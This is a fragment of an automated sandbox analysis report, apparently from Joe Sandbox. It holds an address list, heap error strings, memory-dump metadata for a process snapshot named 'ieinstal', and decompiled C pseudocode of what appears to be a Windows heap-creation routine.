0x1efd753c
0x1efd753c
0x1efd7b18
0x1efd7b18
0x1efd7b1b
0x1efd7b1e
0x1efd7b21
0x1efd7b23
0x1efd7b29
0x1efd7b2c
0x1efd7b35
0x1efd7b3c
0x1efd7b42
0x1efd7b45
0x1efd7b47
0x1efd7b4a
0x1efd7b4c
0x1efd7b4c
0x1efd7b4f
0x1efd7b4f
0x1efd7b4a
0x1efd7b5b
0x1efd7b5f
0x1efd7b64
0x1efd7b67
0x1efd7b69
0x1efd7b6f
0x1efd7b76
0x1efd7b7a
0x1efd7b9c
0x1efd7ba1
0x1efd7ba6
0x1efd7b7c
0x1efd7b92
0x1efd7b97
0x1efd7b97
0x1efd7bb4
0x1efd7bbb
0x1efd7bc0
0x1efd7bc3
0x1efd7bc9
0x1efd7bcd
0x1efd7be9
0x1efd7bcf
0x1efd7bcf
0x1efd7bd6
0x1efd7bd9
0x1efd7bdf
0x1efd7be0
0x1efd7be0
0x1efd7bcd
0x1efd7bec
0x1efd7bec
0x1efd7b2c
0x1efd7bef
0x1efd7bf2
0x1efd7bf6
0x1efd7c13
0x1efd7c19
0x1efd7c1c
0x1efd7c1e
0x1efd7c21
0x1efd7c27
0x1efd7c2a
0x1efd7c2d
0x1efd7c33
0x1efd7c36
0x1efd7c39
0x1efd7c3c
0x1efd7c43
0x1efd7c47
0x1efd7c3e
0x1efd7c3e
0x1efd7c3e
0x1efd7c4b
0x1efd7c4f
0x1efd7c51
0x1efd7c71
0x1efd7c71
0x1efd7c74
0x1efd7c77
0x1efd7c7d
0x1efd7c84
0x1efd7c8a
0x1efd7c8d
0x1efd7c94
0x1efd7c96
0x1efd7c98
0x1efd7c98
0x1efd7c9b
0x1efd7c9b
0x1efd7ca1
0x1efd7ca5
0x1efd8861
0x1efd8865
0x1efd88ba
0x1efd88be
0x00000000
0x1efd88c0
0x1efd88c5
0x1efd88d1
0x00000000
0x1efd88d1
0x00000000
0x1efd8867
0x1efd886e
0x1efd8876
0x1efd8876
0x1efd8876
0x1efd8879
0x1efd8879
0x1efd887d
0x1efd887f
0x1efd8886
0x1efd888e
0x1efd8891
0x1efd8891
0x1efd8891
0x1efd8891
0x1efd8895
0x1efd8898
0x1efd889b
0x1efd889e
0x1efd88a1
0x1efd88a4
0x1efd88a7
0x1efd894d
0x1efd8950
0x1efd8956
0x1efd895b
0x00000000
0x1efd895d
0x1efd895f
0x1efd8978
0x1efd8978
0x1efd88ad
0x1efd88b0
0x1efd88b3
0x1efd88d8
0x1efd88de
0x1efd88de
0x1efd88df
0x1efd88b5
0x1efd88b5
0x1efd88b5
0x1efd88e2
0x1efd88e4
0x1efd88ec
0x1efd88ee
0x1efd88f1
0x1efd88f8
0x1efd8904
0x1efd8904
0x1efd890d
0x1efd8910
0x1efd8916
0x1efd891b
0x1efd897c
0x1efd897c
0x1efd891d
0x1efd891f
0x1efd8941
0x1efd8941
0x1efd891b
0x1efd897f
0x1efd8983
0x1efd8993
0x1efd8998
0x1efd8998
0x1efd7cab
0x1efd7cab
0x1efd7caf
0x1efd7cb1
0x1efd7cbc
0x1efd7cc2
0x1efd7cc2
0x1efd7cc2
0x1efd7cc4
0x1efd7cc8
0x1efd7cce
0x1efd7cd5
0x1efd7cdb
0x1efd7ce1
0x1efd7ce7
0x1efd7ced
0x1efd7cef
0x1efd7d05
0x1efd7d07
0x1efd7d0d
0x1efd7d0f
0x1efd7d0f
0x1efd7d15
0x1efd7d15
0x1efd7d1b
0x1efd7d21
0x1efd7d2b
0x1efd7d2d
0x1efd7d34
0x1efd7d44
0x1efd7d44
0x1efd7d36
0x1efd7d36
0x1efd7d3d
0x1efd7d42
0x00000000
0x00000000
0x1efd7d42
0x1efd7d49
0x1efd7d4f
0x1efd7d51
0x1efd7d57
0x1efd7d5c
0x1efd7d5c
0x1efd7d57
0x1efd7d62
0x1efd7d6c
0x1efd7d6c
0x1efd7d2b
0x1efd7d76
0x1efd7d7c
0x1efd7d7c
0x1efd7d7c
0x1efd7d80
0x1efd7d82
0x1efd7d89
0x1efd7d89
0x1efd7d94
0x1efd7d98
0x1efd7d9a
0x1efd7d9d
0x1efd7d9f
0x1efd7da2
0x1efd7da5
0x1efd7da5
0x1efd7daa
0x1efd7dad
0x1efd7db0
0x1efd7db2
0x1efd7dbb
0x1efd7dbb
0x1efd7dbe
0x1efd7dc8
0x1efd7dcd
0x1efd7dd8
0x1efd7ddc
0x1efd7dde
0x1efd7de1
0x00000000
0x00000000
0x1efd8854
0x1efd8859
0x1efd8859
0x1efd7de7
0x1efd7dea
0x1efd7df1
0x1efd7df1
0x1efd7dea
0x1efd7d9d
0x1efd7df6
0x1efd7df6
0x1efd7dfa
0x1efd7dfe
0x1efd7e13
0x1efd7e18
0x1efd7dfe
0x1efd7c53
0x1efd7c53
0x1efd7c56
0x1efd7e2f
0x1efd7e31
0x1efd7e34
0x1efd7e37
0x1efd7e3d
0x1efd7e40
0x1efd7e42
0x1efd7e5e
0x1efd7e60
0x1efd7e44
0x1efd7e58
0x1efd7e5a
0x1efd7e5a
0x1efd7e62
0x1efd7e68
0x1efd7e6e
0x1efd7e71
0x1efd7e7b
0x1efd7e7e
0x1efd7e8a
0x1efd7e8e
0x1efd7e91
0x1efd7e9e
0x1efd7e9f
0x1efd7ea2
0x1efd7ea5
0x1efd7eaa
0x1efd7eba
0x1efd7ebf
0x1efd7ec2
0x1efd7ec2
0x1efd7e93
0x1efd7e93
0x1efd7e93
0x1efd7ec5
0x1efd7ec8
0x1efd7ecb
0x1efd7ecf
0x1efd7ed2
0x1efd7ed2
0x1efd7ed5
0x1efd7ee0
0x1efd7ee3
0x1efd7ee5
0x00000000
0x00000000
0x1efd8459
0x1efd845b
0x1efd8460
0x1efd8462
0x1efd8470
0x1efd8475
0x1efd8477
0x1efd8479
0x1efd847e
0x1efd847e
0x1efd8477
0x1efd8483
0x1efd8486
0x1efd8488
0x1efd848b
0x1efd848e
0x1efd8491
0x1efd8493
0x1efd8496
0x1efd8498
0x1efd87f0
0x1efd87fc
0x00000000
0x1efd849e
0x1efd849e
0x1efd84a0
0x00000000
0x1efd84a6
0x1efd84a9
0x1efd84ac
0x1efd84b2
0x1efd84b4
0x1efd84b6
0x1efd84b6
0x1efd84b9
0x1efd84bc
0x1efd84be
0x00000000
0x00000000
0x1efd84c0
0x1efd84c2
0x1efd84c4
0x1efd8513
0x00000000
0x1efd84c6
0x1efd84c6
0x1efd84c6
0x00000000
0x1efd84c4
0x1efd84c9
0x1efd84dc
0x1efd84dc
0x1efd84e1
0x1efd84e4
0x1efd84e7
0x1efd84e9
0x1efd84ec
0x1efd84f0
0x1efd8517
0x1efd8517
0x1efd851b
0x1efd851f
0x1efd8525
0x1efd8528
0x1efd852b
0x1efd8534
0x1efd853b
0x1efd8541
0x1efd8544
0x1efd8546
0x1efd8549
0x1efd854b
0x1efd854b
0x1efd854e
0x1efd854e
0x1efd8549
0x1efd855e
0x1efd8563
0x1efd8566
0x1efd856c
0x1efd8572
0x1efd8579
0x1efd857d
0x1efd859f
0x1efd85a4
0x1efd85a9
0x1efd857f
0x1efd8595
0x1efd859a
0x1efd859a
0x1efd85b4
0x1efd85bb
0x1efd85c0
0x1efd85c3
0x1efd85c9
0x1efd85cd
0x1efd85cf
0x1efd85d6
0x1efd85dc
0x1efd85dd
0x1efd85dd
0x1efd85ea
0x1efd85ea
0x1efd856c
0x1efd852b
0x1efd85f0
0x1efd85f9
0x1efd85fb
0x1efd85fe
0x1efd8601
0x1efd8604
0x1efd860a
0x1efd87de
0x1efd8610
0x1efd8610
0x1efd8613
0x1efd861c
0x1efd8621
0x1efd8625
0x1efd86f7
0x1efd86fa
0x1efd86fe
0x1efd8702
0x1efd8711
0x1efd8715
0x1efd871a
0x1efd871a
0x1efd871a
0x1efd871a
0x1efd871e
0x1efd8724
0x1efd872b
0x1efd8740
0x1efd872d
0x1efd8736
0x1efd8738
0x1efd8738
0x1efd8742
0x1efd8742
0x1efd8744
0x00000000
0x00000000
0x1efd8746
0x1efd874a
0x1efd875f
0x1efd874c
0x1efd874c
0x1efd874f
0x1efd8752
0x1efd8755
0x1efd8757
0x1efd875a
0x1efd875a
0x1efd8755
0x1efd8763
0x1efd876a
0x1efd876c
0x1efd876e
0x1efd8770
0x00000000
0x1efd8770
0x00000000
0x1efd876c
0x1efd8778
0x1efd8778
0x1efd877b
0x1efd877e
0x1efd8780
0x1efd8782
0x1efd8796
0x1efd879b
0x1efd8784
0x1efd8784
0x1efd8786
0x1efd8789
0x1efd878b
0x1efd878b
0x1efd87a3
0x1efd87a6
0x1efd87ac
0x1efd87ae
0x00000000
0x1efd87b4
0x1efd87b4
0x1efd87b7
0x1efd87b7
0x1efd87ba
0x00000000
0x00000000
0x1efd87c0
0x1efd87c2
0x1efd87c4
0x1efd87d5
0x00000000
0x1efd87c6
0x1efd87c9
0x1efd87c9
0x1efd87c9
0x1efd87ca
0x1efd87ca
0x00000000
0x1efd87ca
0x1efd87bc
0x00000000
0x1efd87bc
0x1efd862b
0x1efd862b
0x1efd862f
0x1efd8633
0x1efd8639
0x1efd8640
0x1efd8655
0x1efd8642
0x1efd864b
0x1efd864d
0x1efd864d
0x1efd8657
0x1efd8657
0x1efd8659
0x00000000
0x00000000
0x1efd865b
0x1efd865f
0x1efd8674
0x1efd8661
0x1efd8661
0x1efd8664
0x1efd8667
0x1efd866a
0x1efd866c
0x1efd866f
0x1efd866f
0x1efd866a
0x1efd8678
0x1efd867f
0x1efd8681
0x1efd8683
0x1efd8685
0x00000000
0x1efd8685
0x00000000
0x1efd8681
0x1efd868d
0x1efd868d
0x1efd8690
0x1efd8693
0x1efd8695
0x1efd8697
0x1efd86ab
0x1efd86b0
0x1efd8699
0x1efd8699
0x1efd869b
0x1efd869e
0x1efd86a0
0x1efd86a0
0x1efd86b8
0x1efd86bb
0x1efd86c1
0x1efd86c3
0x1efd8436
0x1efd8436
0x1efd843a
0x1efd8448
0x1efd844e
0x1efd844e
0x00000000
0x1efd86c9
0x1efd86c9
0x1efd86d0
0x1efd86d0
0x1efd86d3
0x00000000
0x00000000
0x1efd86d9
0x1efd86db
0x1efd86dd
0x1efd86ee
0x00000000
0x1efd86df
0x1efd86e2
0x1efd86e2
0x1efd86e2
0x1efd86e3
0x1efd86e3
0x1efd842a
0x1efd8431
0x00000000
0x1efd8431
0x1efd86d5
0x00000000
0x1efd86d5
0x1efd86c3
0x00000000
0x1efd8625
0x1efd87e3
0x1efd87e3
0x1efd87e7
0x00000000
0x1efd84f2
0x1efd84f6
0x1efd84fb
0x1efd84fd
0x00000000
0x1efd84ff
0x1efd8509
0x1efd8801
0x1efd8801
0x1efd8805
0x1efd8809
0x1efd881a
0x1efd8824
0x1efd882e
0x1efd8835
0x1efd8845
0x1efd880b
0x1efd880b
0x1efd8812
0x00000000
0x1efd8812
0x1efd8809
0x1efd84fd
0x1efd84f0
0x1efd84a0
0x00000000
0x1efd8498
0x1efd7eeb
0x1efd7eee
0x1efd7ef8
0x1efd7efc
0x1efd7f00
0x1efd835c
0x1efd835f
0x1efd8363
0x1efd8367
0x1efd8376
0x1efd837a
0x1efd837f
0x1efd837f
0x1efd837f
0x1efd8383
0x1efd8383
0x1efd8386
0x1efd838c
0x1efd8393
0x1efd83a0
0x1efd8395
0x1efd839c
0x1efd839c
0x1efd83a2
0x1efd83a2
0x1efd83a4
0x00000000
0x00000000
0x1efd83a6
0x1efd83aa
0x1efd83bf
0x1efd83ac
0x1efd83ac
0x1efd83af
0x1efd83b2
0x1efd83b5
0x1efd83b7
0x1efd83ba
0x1efd83ba
0x1efd83b5
0x1efd83c3
0x1efd83cd
0x1efd83d0
0x1efd83d2
0x00000000
0x1efd83d2
0x00000000
0x1efd83d0
0x1efd83d6
0x1efd83d6
0x1efd83d9
0x1efd83dc
0x1efd83de
0x1efd83e0
0x1efd83f4
0x1efd83f9
0x1efd83e2
0x1efd83e2
0x1efd83e4
0x1efd83e7
0x1efd83e9
0x1efd83e9
0x1efd8401
0x1efd8404
0x1efd840a
0x1efd840c
0x1efd840e
0x1efd8411
0x1efd8411
0x1efd8414
0x00000000
0x00000000
0x1efd841a
0x1efd841c
0x1efd841e
0x1efd8455
0x00000000
0x1efd8420
0x1efd8423
0x1efd8423
0x1efd8423
0x1efd8424
0x1efd8424
0x00000000
0x1efd8424
0x1efd8416
0x00000000
0x1efd8416
0x1efd7f06
0x1efd7f06
0x1efd7f0a
0x1efd7f0e
0x1efd7f14
0x1efd7f1a
0x1efd7f1d
0x1efd7f1f
0x1efd81c7
0x1efd7f25
0x1efd7f25
0x1efd7f25
0x1efd7f28
0x1efd7f2a
0x00000000
0x00000000
0x1efd7f36
0x1efd7f38
0x1efd7f3a
0x1efd81bd
0x1efd81bf
0x00000000
0x1efd7f40
0x1efd7f40
0x1efd7f43
0x1efd7f43
0x1efd7f43
0x1efd7f49
0x1efd7f49
0x1efd7f53
0x1efd7f56
0x1efd7f5d
0x1efd7f60
0x1efd7f63
0x1efd7f66
0x1efd7f68
0x1efd7f71
0x1efd7f74
0x1efd7f77
0x1efd7f79
0x1efd7f7f
0x1efd7f83
0x1efd7f85
0x1efd7f88
0x1efd7f8b
0x1efd7fa4
0x1efd7fa6
0x1efd7fb8
0x1efd7fbd
0x1efd7fbd
0x1efd7fa6
0x1efd7fc6
0x1efd7fc8
0x1efd7fce
0x1efd7fd0
0x1efd7fdf
0x1efd7fe2
0x1efd7fe5
0x1efd7fe7
0x1efd7fed
0x1efd7ff1
0x1efd7ff3
0x1efd7ff6
0x1efd7ff9
0x1efd8012
0x1efd8014
0x1efd8026
0x1efd802b
0x1efd802b
0x1efd8014
0x1efd8034
0x1efd8036
0x1efd803c
0x1efd803e
0x1efd804a
0x1efd804d
0x1efd80ec
0x1efd80ec
0x1efd80f1
0x1efd80fe
0x1efd8101
0x1efd8104
0x1efd810d
0x1efd810f
0x1efd8114
0x1efd8114
0x1efd8116
0x1efd8119
0x1efd8119
0x1efd811f
0x1efd8125
0x1efd8127
0x00000000
0x00000000
0x1efd8129
0x1efd812b
0x1efd8135
0x1efd8137
0x1efd81ad
0x1efd81b0
0x1efd81b0
0x1efd81b2
0x1efd81b5
0x00000000
0x00000000
0x00000000
0x00000000
0x1efd812d
0x1efd812d
0x1efd8130
0x1efd8132
0x00000000
0x1efd8132
0x00000000
0x1efd812b
0x1efd8139
0x1efd813c
0x1efd8165
0x1efd8168
0x1efd816a
0x1efd8182
0x1efd8182
0x1efd816c
0x1efd8173
0x1efd8173
0x1efd813e
0x1efd813e
0x1efd8141
0x1efd8143
0x1efd815b
0x1efd8145
0x1efd8145
0x1efd8145
0x1efd8143
0x1efd8188
0x1efd818a
0x1efd8190
0x1efd8193
0x1efd8197
0x1efd8199
0x1efd8199
0x1efd8199
0x1efd819e
0x1efd8053
0x1efd8057
0x1efd805a
0x00000000
0x1efd8060
0x1efd8060
0x1efd8063
0x1efd8067
0x1efd8069
0x1efd8069
0x1efd8069
0x1efd806e
0x1efd8071
0x1efd8071
0x1efd8074
0x00000000
0x00000000
0x1efd8076
0x1efd8079
0x1efd807f
0x1efd8083
0x1efd8085
0x1efd8088
0x1efd808b
0x1efd80a4
0x1efd80a6
0x1efd80b9
0x1efd80be
0x1efd80be
0x1efd80a6
0x1efd80c7
0x1efd80c9
0x1efd80cf
0x1efd80d1
0x1efd80dd
0x00000000
0x1efd80d3
0x1efd80d3
0x1efd80d5
0x1efd80d5
0x00000000
0x1efd80d1
0x1efd80e1
0x1efd80e4
0x1efd80e4
0x1efd805a
0x1efd8040
0x1efd8043
0x1efd8043
0x1efd7fd2
0x1efd7fd2
0x1efd7fd2
0x1efd7f6a
0x1efd7f6a
0x1efd7f6a
0x1efd81a1
0x1efd81a1
0x1efd81a3
0x00000000
0x00000000
0x1efd81a5
0x00000000
0x1efd81a5
0x1efd7f2c
0x1efd7f32
0x00000000
0x1efd7f32
0x1efd81c9
0x1efd81c9
0x1efd81d0
0x1efd81d0
0x1efd81d2
0x00000000
0x00000000
0x1efd81d4
0x1efd81d8
0x1efd81f3
0x1efd81da
0x1efd81da
0x1efd81dd
0x1efd81e3
0x1efd81e6
0x1efd81e8
0x1efd81eb
0x1efd81eb
0x1efd81e6
0x1efd81f7
0x1efd8201
0x1efd8203
0x1efd8205
0x1efd8207
0x00000000
0x1efd8207
0x00000000
0x1efd8203
0x1efd820f
0x1efd820f
0x1efd8212
0x1efd8215
0x1efd8217
0x1efd8219
0x1efd822d
0x1efd8232
0x1efd821b
0x1efd821b
0x1efd821d
0x1efd8220
0x1efd8222
0x1efd8222
0x1efd823a
0x1efd823d
0x1efd8243
0x1efd8246
0x1efd8248
0x1efd824e
0x1efd8251
0x1efd8254
0x1efd8254
0x1efd8257
0x1efd8259
0x00000000
0x00000000
0x1efd8265
0x1efd8267
0x1efd8269
0x1efd834d
0x1efd834f
0x00000000
0x1efd826f
0x1efd826f
0x1efd8272
0x1efd8272
0x1efd8278
0x1efd827a
0x1efd827d
0x1efd8280
0x1efd8284
0x1efd8287
0x1efd8289
0x1efd8289
0x1efd828b
0x1efd8291
0x1efd829d
0x1efd82a4
0x1efd82a6
0x1efd82a9
0x1efd82ab
0x1efd82ab
0x1efd82ab
0x1efd82ab
0x1efd82ae
0x1efd82b1
0x1efd82b3
0x1efd8319
0x1efd831c
0x1efd8322
0x1efd82b5
0x1efd82b5
0x1efd82b8
0x1efd82bb
0x1efd82bd
0x1efd82c3
0x1efd82c7
0x1efd82c9
0x1efd82cc
0x1efd82cf
0x1efd82e8
0x1efd82ea
0x1efd82fc
0x1efd8301
0x1efd8301
0x1efd8304
0x1efd8304
0x1efd830d
0x1efd830f
0x1efd8315
0x1efd8317
0x00000000
0x00000000
0x1efd8317
0x1efd8325
0x1efd8329
0x1efd8345
0x1efd8345
0x00000000
0x1efd8329
0x1efd825b
0x1efd8261
0x00000000
0x1efd8261
0x1efd8248
0x00000000
0x1efd7c5c
0x1efd7c5c
0x1efd7c5f
0x1efd7c62
0x1efd7c65
0x1efd7c68
0x1efd7e20
0x1efd7e24
0x1efd7c6e
0x1efd7c6e
0x1efd7c6e
0x00000000
0x1efd7c68
0x1efd7c56
0x1efd7bf8
0x1efd7c06
0x1efd7c06
0x1efd74ce
0x1efd74d2
0x1efd74d7
0x1efd74d9
0x00000000
0x1efd74db
0x1efd74e5
0x1efd7556
0x1efd7556
0x1efd7560
0x1efd756a
0x1efd7571
0x1efd7581
0x1efd7581
0x1efd74d9
0x1efd74cc
0x1efd7386
0x1efd737e
0x1efd733d
0x1efd7333
0x1efd7167
0x1efd716d
0x1efd7174
0x1efd71d3
0x1efd71d3
0x1efd71d3
0x1efd71d9
0x1efd71d9
0x1efd71dd
0x1efd71e1
0x1efd71e8
0x1efd71ea
0x1efd71ec
0x1efd71ec
0x1efd71f1
0x00000000
0x1efd7176
0x1efd7176
0x1efd717c
0x1efd71b0
0x1efd71c0
0x1efd71ca
0x1efd71cc
0x00000000
0x1efd717e
0x1efd717e
0x1efd7187
0x1efd7191
0x1efd7198
0x1efd71a8
0x1efd71a8
0x1efd717c
0x1efd7174
0x1efd8c4a
0x1efd8c4a
0x1efd8c51
0x1efd8c5d
0x1efd8c97
0x1efd8c5f
0x1efd8c68
0x1efd8c68
0x1efd8c9f
0x1efd8ca7
0x1efd8cac
0x1efd8cbb
0x1efd8cbb
0x1efd8cac
0x1efd8cc6
0x1efd8cd4
0x1efd8cd4
0x00000000

Strings

HEAP: , xrefs: 1EFD7B9C, 1EFD859F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 1EFD7BB6, 1EFD85B6
HEAP[%wZ]: , xrefs: 1EFD7B8D, 1EFD8590

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: e1a1bf13b3d2ec212f7db1bd81957da5afd6761de32b8542b0db015d9d222fb4
Instruction ID: 0a47035c973687b3276cc7b468e6db2f85eed6ab29dcf466bd9cd5448b5ae673
Opcode Fuzzy Hash: e1a1bf13b3d2ec212f7db1bd81957da5afd6761de32b8542b0db015d9d222fb4
Instruction Fuzzy Hash: CD13AF75A00395CFDB15CF69C4A07A9FBB2FF44304F188299DC49AB385D735A949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD0F90 Relevance: 5.9, Strings: 4, Instructions: 940
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1EFD0F90(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t415;
				signed int _t419;
				void* _t420;
				void* _t424;
				void* _t427;
				void _t435;
				signed int _t438;
				intOrPtr _t440;
				void* _t442;
				void* _t443;
				signed int _t444;
				void* _t447;
				unsigned int _t453;
				intOrPtr* _t473;
				intOrPtr* _t475;
				intOrPtr* _t477;
				intOrPtr* _t479;
				void* _t505;
				void* _t507;
				signed int _t513;
				void* _t519;
				void* _t522;
				intOrPtr _t523;
				void* _t524;
				void* _t527;
				char* _t534;
				intOrPtr _t545;
				intOrPtr _t554;
				void* _t557;
				void* _t558;
				signed int _t559;
				void* _t562;
				signed int _t564;
				void* _t565;
				signed int _t570;
				signed int _t571;
				intOrPtr _t592;
				void* _t601;
				signed int _t602;
				void* _t605;
				unsigned int _t613;
				void* _t616;
				void* _t620;
				signed int _t626;
				intOrPtr _t627;
				void* _t630;
				void* _t631;
				signed int _t641;
				intOrPtr _t643;
				signed int _t658;
				void* _t666;
				signed int _t671;
				signed int _t672;
				signed int _t682;
				void* _t686;
				signed int _t691;
				signed char _t692;
				signed int _t693;
				void* _t701;
				void* _t702;
				signed char _t703;
				void* _t718;
				void* _t719;
				void* _t721;
				short _t723;
				void* _t724;
				signed int _t726;
				signed int _t727;
				void* _t741;
				void* _t742;
				intOrPtr* _t745;
				void* _t746;
				signed int _t747;
				signed int _t748;
				void* _t750;
				intOrPtr* _t758;
				void* _t759;
				void* _t761;
				void* _t764;
				intOrPtr _t768;
				void* _t769;
				void* _t774;

				_push(0x11c);
				_push(0x1f09c130);
				E1F017C40(__ebx, __edi, __esi);
				_t613 =  *(_t759 + 0x18);
				 *(_t759 - 0xb4) = _t613;
				_t691 =  *(_t759 + 8);
				 *(_t759 - 0xb0) = _t691;
				_t415 =  *(_t759 + 0xc);
				 *(_t759 - 0xb8) = _t415;
				 *(_t759 - 0xf4) = _t415;
				_t616 =  *(_t759 + 0x10);
				 *(_t759 - 0xc8) = _t616;
				_t741 =  *(_t759 + 0x14);
				 *(_t759 - 0xc0) = _t741;
				 *(_t759 - 0xe8) = _t613;
				_t718 =  *(_t759 + 0x1c);
				 *(_t759 - 0xd4) =  *( *[fs:0x30] + 0x68);
				 *(_t759 - 0xe4) = 0;
				 *(_t759 - 0xac) = 0;
				 *(_t759 - 0xd0) = 0;
				_t768 =  *0x1f0b373c; // 0x0
				if(_t768 != 0) {
					__eflags =  *(_t759 - 0xb8);
					if( *(_t759 - 0xb8) != 0) {
						goto L1;
					}
					__eflags =  *(_t759 - 0xb4);
					if( *(_t759 - 0xb4) != 0) {
						goto L1;
					}
					_t758 =  *0x1f0b3754; // 0x0
					 *0x1f0b91e0(_t691, 0, _t616, _t741, 0, _t718);
					 *_t758();
					_t742 = 0;
					__eflags = 0;
					if(0 != 0) {
						L82:
						_t719 =  *(_t759 - 0xb8);
						L83:
						_t693 =  *(_t759 - 0xb4);
						L84:
						_t419 =  *(_t759 - 0xd0);
						if(_t419 != 0) {
							__eflags = _t419 - _t693;
							if(_t419 != _t693) {
								E1EFBFBD0(0, _t719, _t742, _t419);
							}
						}
						if( *(_t759 - 0xac) != 0) {
							__eflags = _t719;
							if(_t719 == 0) {
								 *(_t759 - 0xbc) = 0;
								E1EFBFABA(_t759 - 0xac, _t759 - 0xbc, 0x8000);
							}
						}
						_t420 = _t742;
						L87:
						 *[fs:0x0] =  *((intOrPtr*)(_t759 - 0x10));
						return _t420;
					}
					__eflags = _t718 - 0xffffffff;
					if(_t718 != 0xffffffff) {
						L117:
						_t719 =  *(_t759 - 0xb8);
						L110:
						_t742 = 0;
						goto L83;
					}
					_t718 = 0;
					_t691 =  *(_t759 - 0xb0);
					_t616 =  *(_t759 - 0xc8);
					L2:
					_t692 = _t691 & 0xf1ffffff;
					 *(_t759 - 0xb0) = _t692;
					_t742 = 0;
					if((_t692 & 0x00000100) != 0) {
						__eflags = _t692 & 0x00000002;
						if((_t692 & 0x00000002) == 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb8);
						if( *(_t759 - 0xb8) != 0) {
							goto L82;
						}
						__eflags = _t616;
						if(_t616 != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xc0);
						if( *(_t759 - 0xc0) != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb4);
						if( *(_t759 - 0xb4) != 0) {
							goto L82;
						}
						__eflags = _t718 - 0xffffffff;
						if(_t718 == 0xffffffff) {
							_t602 =  *0x1f0b3744; // 0x0
							asm("sbb eax, eax");
							_t718 = _t718 &  !( ~_t602);
							__eflags = _t718;
						}
						__eflags = _t718;
						if(_t718 == 0) {
							_t742 = _t759 - 0x4c;
							goto L4;
						} else {
							_t742 = _t718;
							_t601 = E1F080A68(_t718);
							__eflags = _t601;
							if(_t601 == 0) {
								goto L117;
							}
							_t692 =  *(_t759 - 0xb0);
							L4:
							_t424 = 2;
							L5:
							if(_t742 != 0) {
								__eflags = _t742 - _t759 - 0x4c;
								if(_t742 == _t759 - 0x4c) {
									_t723 = 0x30;
									E1F008F40(_t742, 0, _t723);
									_t435 = 2;
									 *_t742 = _t435;
									 *((short*)(_t742 + 2)) = _t723;
									 *((intOrPtr*)(_t742 + 0xc)) = 1;
									_t314 = _t742 + 0x10;
									 *_t314 =  *(_t742 + 0x10) | 0xffffffff;
									__eflags =  *_t314;
								}
								__eflags =  *(_t742 + 4) & 0x00000001;
								if(( *(_t742 + 4) & 0x00000001) == 0) {
									_t620 = E1F080A21(_t742);
									_t721 =  *(_t759 - 0xc8);
									_t427 =  *(_t759 - 0xc0);
									__eflags = _t721;
									if(_t721 == 0) {
										_t721 = _t427;
									}
									__eflags = _t427 - _t721;
									if(_t427 > _t721) {
										_t427 = _t721;
									}
									_t742 = E1F088BBE(E1F06D85E(_t427,  *(_t759 - 0xb0),  *(_t759 - 0xd4)), _t721, _t427, _t620, _t692);
									__eflags = _t742;
									if(_t742 != 0) {
										E1EFB918A(_t742, 0, 1, 0);
										__eflags =  *(_t742 + 0x14);
										if( *(_t742 + 0x14) == 0) {
											E1F088E26(_t742);
											_t742 = 0;
										}
									}
									goto L82;
								} else {
									__eflags =  *0x1f0b3744; // 0x0
									if(__eflags == 0) {
										goto L117;
									}
									_t719 =  *(_t759 - 0xb8);
									_t745 =  *0x1f0b3754; // 0x0
									 *0x1f0b91e0( *(_t759 - 0xb0), _t719,  *(_t759 - 0xc8),  *(_t759 - 0xc0), 0, 0);
									_t742 =  *_t745();
									goto L83;
								}
							}
							if((_t692 & 0x10000000) != 0) {
								L9:
								_t746 = 0x30;
								E1F008F40(_t759 - 0xa8, 0, _t746);
								_t764 = _t761 + 0xc;
								if(_t718 != 0) {
									 *((intOrPtr*)(_t759 - 4)) = 0;
									__eflags =  *_t718 - _t746;
									if( *_t718 == _t746) {
										_t682 = 0xc;
										memcpy(_t759 - 0xa8, _t718, _t682 << 2);
										_t764 = _t764 + 0xc;
									}
									 *((intOrPtr*)(_t759 - 4)) = 0xfffffffe;
								}
								_t626 =  *(_t759 - 0xd4);
								_t438 =  *(_t759 - 0xb0);
								if((_t626 & 0x00000010) != 0) {
									_t438 = _t438 | 0x00000020;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000020) != 0) {
									_t438 = _t438 | 0x00000040;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00200000) != 0) {
									_t438 = _t438 | 0x00000080;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000040) != 0) {
									_t438 = _t438 | 0x40000000;
									 *(_t759 - 0xb0) = _t438;
								}
								if((0x00000080 & _t626) != 0) {
									_t438 = _t438 | 0x20000000;
									 *(_t759 - 0xb0) = _t438;
								}
								_t699 = 0x1000;
								if((0x00001000 & _t626) != 0) {
									 *(_t759 - 0xb0) = _t438 | 0x08000000;
								}
								_t627 =  *[fs:0x30];
								if( *((intOrPtr*)(_t759 - 0xa4)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa4)) =  *((intOrPtr*)(_t627 + 0x78));
								}
								if( *((intOrPtr*)(_t759 - 0xa0)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa0)) =  *((intOrPtr*)(_t627 + 0x7c));
								}
								if( *(_t759 - 0x9c) == 0) {
									 *(_t759 - 0x9c) =  *(_t627 + 0x84);
								}
								if( *(_t759 - 0x98) == 0) {
									 *(_t759 - 0x98) =  *(_t627 + 0x80);
								}
								_t440 =  *0x1f0b693c; // 0x7ffeffff
								if(_t440 == 0) {
									 *0x1f0b6940 = 0x10000;
									_push(0);
									_push(0x2c);
									_push(_t759 - 0x78);
									_push(0);
									_t442 = E1F002D10();
									__eflags = _t442;
									if(_t442 < 0) {
										goto L117;
									}
									_t440 =  *((intOrPtr*)(_t759 - 0x58));
									 *0x1f0b693c = _t440;
									_t699 = 0x1000;
								}
